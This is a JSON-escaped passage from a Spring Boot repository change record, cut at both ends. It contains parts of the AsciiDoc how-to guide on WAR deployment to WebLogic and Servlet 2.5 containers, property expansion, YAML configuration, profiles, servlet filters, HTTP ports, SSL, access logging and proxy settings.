SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntricks.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (e.g. if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to squash all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\nthat doesn't work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features will usually\nneed to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to a Spring\nBoot application, and the guidance above might help, but your mileage may vary.\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic would be something like this:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.context.web.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use logback, you will also need to tell WebLogic to prefer the packaged version\nrather than the version that pre-installed with the server. You can do this by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttp:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-servlet-2-5]]\n=== Deploying a WAR in an Old (Servlet 2.5) Container\nSpring Boot uses Servlet 3.0 APIs to initialize the `ServletContext` (register `Servlets`\netc.) so you can't use the same application out of the box in a Servlet 2.5 container.\nIt *is* however possible to run a Spring Boot application on an older container with some\nspecial tools. If you include `org.springframework.boot:spring-boot-legacy` as a\ndependency (https:\/\/github.com\/scratches\/spring-boot-legacy[maintained separately] to the\ncore of Spring Boot and currently available at 1.0.2.RELEASE), all you should need to do\nis create a `web.xml` and declare a context listener to create the application context and\nyour filters and servlets. The context listener is a special purpose one for Spring Boot,\nbut the rest of it is normal for a Spring application in Servlet 2.5. Example:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<web-app version=\"2.5\" xmlns=\"http:\/\/java.sun.com\/xml\/ns\/javaee\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee http:\/\/java.sun.com\/xml\/ns\/javaee\/web-app_2_5.xsd\">\n\n\t\t<context-param>\n\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t<param-value>demo.Application<\/param-value>\n\t\t<\/context-param>\n\n\t\t<listener>\n\t\t\t<listener-class>org.springframework.boot.legacy.context.web.SpringBootContextLoaderListener<\/listener-class>\n\t\t<\/listener>\n\n\t\t<filter>\n\t\t\t<filter-name>metricsFilter<\/filter-name>\n\t\t\t<filter-class>org.springframework.web.filter.DelegatingFilterProxy<\/filter-class>\n\t\t<\/filter>\n\n\t\t<filter-mapping>\n\t\t\t<filter-name>metricsFilter<\/filter-name>\n\t\t\t<url-pattern>\/*<\/url-pattern>\n\t\t<\/filter-mapping>\n\n\t\t<servlet>\n\t\t\t<servlet-name>appServlet<\/servlet-name>\n\t\t\t<servlet-class>org.springframework.web.servlet.DispatcherServlet<\/servlet-class>\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextAttribute<\/param-name>\n\t\t\t\t<param-value>org.springframework.web.context.WebApplicationContext.ROOT<\/param-value>\n\t\t\t<\/init-param>\n\t\t\t<load-on-startup>1<\/load-on-startup>\n\t\t<\/servlet>\n\n\t\t<servlet-mapping>\n\t\t\t<servlet-name>appServlet<\/servlet-name>\n\t\t\t<url-pattern>\/<\/url-pattern>\n\t\t<\/servlet-mapping>\n\n\t<\/web-app>\n----\n\nIn this example we are using a single application context (the one created by the context\nlistener) and attaching it to the `DispatcherServlet` using an init parameter. This is\nnormal in a Spring Boot application (you normally only have one application context).\n","old_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' type of questions\nthat often arise when using Spring Boot. This is by no means an exhaustive list, but it\ndoes cover quite a lot.\n\nIf you are having a specific problem that we don't cover here, you might want to check out\nhttp:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer; this is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe're also more than happy to extend this section; If you want to add a '`how-to`' you\ncan send us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot application\n\n\n[[howto-failure-analyzer]]\n=== Create your own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\ninto a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such analyzer for application context related exceptions, JSR-303\nvalidations and more. It is actually very easy to create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. If for whatever reason you can't handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations are to be registered in a `META-INF\/spring.factories`:\nthe following registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot auto-configuration\nThe Spring Boot auto-configuration tries its best to '`do the right thing`', but\nsometimes things fail and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You will see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` there is also an `autoconfig` endpoint that renders the report\nin JSON. Use that to debug the application and see what features have been added (and\nwhich not) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. Some\nrules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources, in particular the\n `+@Conditional*+` annotations to find out what features they enable and when. Add\n `--debug` to the command line or a System property `-Ddebug` to get a log on the\n console of all the auto-configuration decisions that were made in your app. In a running\n Actuator app look at the `autoconfig` endpoint ('`\/autoconfig`' or the JMX equivalent) for\n the same information.\n* Look for classes that are `@ConfigurationProperties` (e.g.\n {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\n and read from there the available external configuration options. The\n `@ConfigurationProperties` has a `name` attribute which acts as a prefix to external\n properties, thus `ServerProperties` has `prefix=\"server\"` and its configuration properties\n are `server.port`, `server.address` etc. In a running Actuator app look at the\n `configprops` endpoint.\n* Look for use of `RelaxedPropertyResolver` to pull configuration values explicitly out of the\n `Environment`. It often is used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`. This is less\n flexible than the `RelaxedPropertyResolver` approach, but does allow some relaxed binding,\n specifically for OS environment variables (so `CAPITALS_AND_UNDERSCORES` are synonyms\n for `period.separated`).\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\n response to SpEL expressions, normally evaluated with placeholders resolved from the\n `Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext before it starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. There is more\nthan one way to register additional ones:\n\n* Programmatically per application by calling the `addListeners` and `addInitializers`\n methods on `SpringApplication` before you run it.\n* Declaratively per application by setting `context.initializer.classes` or\n `context.listener.classes`.\n* Declaratively for all applications by adding a `META-INF\/spring.factories` and packaging\n a jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (even\nsome before the context is created), and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n_<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>_ in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, this example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` will already have been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. This example adds the `custom-resource` property source at the\nend of the list so that a key defined in any of the usual other locations takes\nprecedence. A custom implementation may obviously defines another order.\n\nNOTE: While using `@PropertySource` on your `@SpringBootApplication` seems convenient and\neasy enough to load a custom resource in the `Environment`, we do not recommend it as\nSpring Boot prepares the `Environment` before the `ApplicationContext` is refreshed. Any\nkey defined via `@PropertySource` will be loaded too late to have any effect on\nauto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext hierarchy (adding a parent or root context)\nYou can use the `ApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See _<<spring-boot-features.adoc#boot-features-fluent-builder-api>>_\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a non-web application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method, but also bootstrap a Spring application to set up\nthe infrastructure to use, then it's easy with the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class depending on whether it\nthinks it needs a web application or not. The first thing you can do to help it is to just\nleave the servlet API dependencies off the classpath. If you can't do that (e.g. you are\nrunning 2 applications from the same code base) then you can explicitly call\n`setWebEnvironment(false)` on your `SpringApplication` instance, or set the\n`applicationContextClass` property (through the Java API or with external properties).\nApplication code that you want to run as your business logic can be implemented as a\n`CommandLineRunner` and dropped into the context as a `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties & configuration\n\n\n\n[[howto-automatic-expansion]]\n=== Automatically expand properties at build time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them using the existing build configuration\ninstead. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic property expansion using Maven\nYou can automatically expand properties from the Maven project using resource\nfiltering. If you use the `spring-boot-starter-parent` you can then refer to your\nMaven '`project properties`' via `@..@` placeholders, e.g.\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (i.e. no filtering is applied on\n`src\/test\/resources`).\n\nTIP: The `spring-boot:run` can add `src\/main\/resources` directly to the classpath\n(for hot reloading purposes) if you enable the `addResources` flag. This circumvents\nthe resource filtering and this feature. You can use the `exec:java` goal instead\nor customize the plugin's configuration, see the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you don't use the starter parent, in your `pom.xml` you need (inside the `<build\/>`\nelement):\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nand (inside `<plugins\/>`):\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you are using standard Spring\nplaceholders in your configuration (e.g. `${foo}`). These may be expanded by the build if\nthat property is not set to `false`.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic property expansion using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties via placeholders, e.g.\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine` which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion\nthe Spring property placeholders need to be escaped like `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the configuration of SpringApplication\nA `SpringApplication` has bean properties (mainly setters) so you can use its Java API as\nyou create the application to modify its behavior. Or you can externalize the\nconfiguration using properties in `+spring.main.*+`. E.g. in `application.properties` you\nmight have.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-environment=false\n\tspring.main.banner-mode=off\n----\n\nand then the Spring Boot banner will not be printed on startup, and the application will\nnot be a web application.\n\nNOTE: The example above also demonstrates how flexible binding allows the use of\nunderscores (`_`) as well as dashes (`-`) in property names.\n\nProperties defined in external configuration overrides the values specified via the Java\nAPI with the notable exception of the sources used to create the `ApplicationContext`. Let's\nconsider this application\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nused with the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application will _now_ show the banner (as overridden by configuration) and use\nthree sources for the `ApplicationContext` (in that order): `demo.MyApp`, `com.acme.Config`,\n`com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the location of external properties of an application\nBy default properties from different sources are added to the Spring `Environment` in a\ndefined order (see _<<spring-boot-features.adoc#boot-features-external-config>>_ in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods, and those added using `setSources()` are inspected to see if they have\n`@PropertySources`, and if they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower\npriority than any added using the default locations (e.g. `application.properties`), system properties, environment variables or the command line.\n\nYou can also provide System properties (or environment variables) to change the behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`), defaults to `application` as the root of\n the file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`) is the file to load (e.g. a classpath\n resource or a URL). A separate `Environment` property source is set up for this document\n and it can be overridden by system properties, environment variables or the\n command line.\n\nNo matter what you set in the environment, Spring Boot will always load\n`application.properties` as described above. If YAML is used then files with the '`.yml`'\nextension are also added to the list by default.\n\nSpring Boot logs the configuration files that are loaded at `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`short`' command line arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can easily enable this by using\nplaceholders in `application.properties`, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you are inheriting from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (i.e.\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttp:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other delimiters].\n\nNOTE: In this specific case the port binding will work in a PaaS environment like Heroku\nand Cloud Foundry, since in those two platforms the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for external properties\nYAML is a superset of JSON and as such is a very convenient syntax for storing external\nproperties in a hierarchical format. E.g.\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and stick it in the root of your classpath, and\nalso add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis 1-level deep and has period-separated keys, a lot like people are used to with\n`Properties` files in Java.\n\nThe example YAML above corresponds to an `application.properties` file\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee _<<spring-boot-features.adoc#boot-features-external-config-yaml>>_ in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the active Spring profiles\nThe Spring `Environment` has an API for this, but normally you would set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`). E.g.\nlaunch your application with a `-D` argument (remember to put it before the main class\nor jar archive):\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot you can also set the active profile in `application.properties`, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting,\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee _<<spring-boot-features.adoc#boot-features-profiles>>_ in\nthe '`Spring Boot features`' section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change configuration depending on the environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` and if any of those profiles is active that document is\nincluded in the final merge (otherwise not).\n\nExample:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn this example the default port is 9000, but if the Spring profile '`development`' is\nactive then the port is 9001, and if '`production`' is active then it is 0.\n\nThe YAML documents are merged in the order they are encountered (so later values override\nearlier ones).\n\nTo do the same thing with properties files you can use `application-${profile}.properties`\nto specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover built-in options for external properties\nSpring Boot binds external properties from `application.properties` (or `.yml`) (and\nother places) into an application at runtime. There is not (and technically cannot be)\nan exhaustive list of all supported properties in a single location because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations, as well as the occasional use of\n`RelaxedPropertyResolver`.\n\n\n\n[[howto-embedded-servlet-containers]]\n== Embedded servlet containers\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter or Listener to an application\nThere are two ways to add `Servlet`, `Filter`, `ServletContextListener` and the other\nlisteners supported by the Servlet spec to your application. You can either provide\nSpring beans for them, or enable scanning for Servlet components.\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter or Listener using a Spring bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` provide a `@Bean` definition for it.\nThis can be very useful when you want to inject configuration or dependencies. However,\nyou must be very careful that they don't cause eager initialization of too many other\nbeans because they have to be installed in the container very early in the application\nlifecycle (e.g. it's not a good idea to have them depend on your `DataSource` or JPA\nconfiguration). You can work around restrictions like that by initializing them lazily\nwhen first used instead of on initialization.\n\nIn the case of `Filters` and `Servlets` you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or `ServletRegistrationBean` instead of or as well as\nthe underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, it will match\n`FORWARD`,`INCLUDE` and `REQUEST`. If async has been enabled, it will match `ASYNC` as\nwell.\n\nIf you are migrating a filter that has no `dispatcher` element in `web.xml` you will\nneed to specify a `dispatcherType` yourself:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilterRegistration() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setDispatcherTypes(DispatcherType.REQUEST);\n\t\t....\n\n\t\treturn registration;\n\t}\n----\n====\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described above>> any `Servlet`\nor `Filter` beans will be registered with the servlet container automatically. To disable\nregistration of a particular `Filter` or `Servlet` bean create a registration bean for it\nand mark it as disabled. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners using classpath scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` will scan from the package\nof the annotated class.\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP port\nIn a standalone application the main HTTP port defaults to `8080`, but can be set with\n`server.port` (e.g. in `application.properties` or as a System property). Thanks to\nrelaxed binding of `Environment` values you can also use `SERVER_PORT` (e.g. as an OS\nenvironment variable).\n\nTo switch off the HTTP endpoints completely, but still create a `WebApplicationContext`,\nuse `server.port=-1` (this is sometimes useful for testing).\n\nFor more details look at _<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>_\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a random unassigned HTTP port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP port at runtime\nYou can access the port the server is running on from log output or from the\n`EmbeddedWebApplicationContext` via its `EmbeddedServletContainer`. The best way to get\nthat and be sure that it has initialized is to add a `@Bean` of type\n`ApplicationListener<EmbeddedServletContainerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field using the `@LocalServerPort` annotation. For\nexample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tEmbeddedWebApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Don't try\nto inject the port in a regular application. As we just saw, the value is only set once\nthe container has initialized; contrary to a test, application code callbacks are\nprocessed early (i.e. before the value is actually available).\n====\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. For example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/context\/embedded\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration like the example above means the application will no longer support\nplain HTTP connector at port 8080. Spring Boot doesn't support the configuration of both\nan HTTP connector and an HTTPS connector via `application.properties`. If you want to\nhave both then you'll need to configure one of them programmatically. It's recommended\nto use `application.properties` to configure HTTPS as the HTTP connector is the easier of\nthe two to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat and Undertow via their respective namespaces.\n\nFor instance, the following logs access on Tomcat with a\nhttps:\/\/tomcat.apache.org\/tomcat-8.0-doc\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the tomcat base dir\nand said directory is a temp directory by default so you may want to fix Tomcat's base\ndirectory or use an absolute path for the logs. In the example above, the logs will\nbe available in `my-tomcat\/logs` relative to the working directory of the application.\n\nAccess logging for undertow can be configured in a similar fashion\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. This can be customized via `server.undertow.accesslog.directory`.\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Use behind a front-end proxy server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy, and not\nto the physical address of the machine hosting your app. Typically such situations are\nhandled via a contract with the proxy, which will add headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most do\nthis out of the box) the absolute links should be rendered correctly as long as\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application is running in Cloud Foundry or Heroku the\n`server.use-forward-headers` property will default to `true` if not specified. In all\nother instances it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's proxy configuration\nIf you are using Tomcat you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, 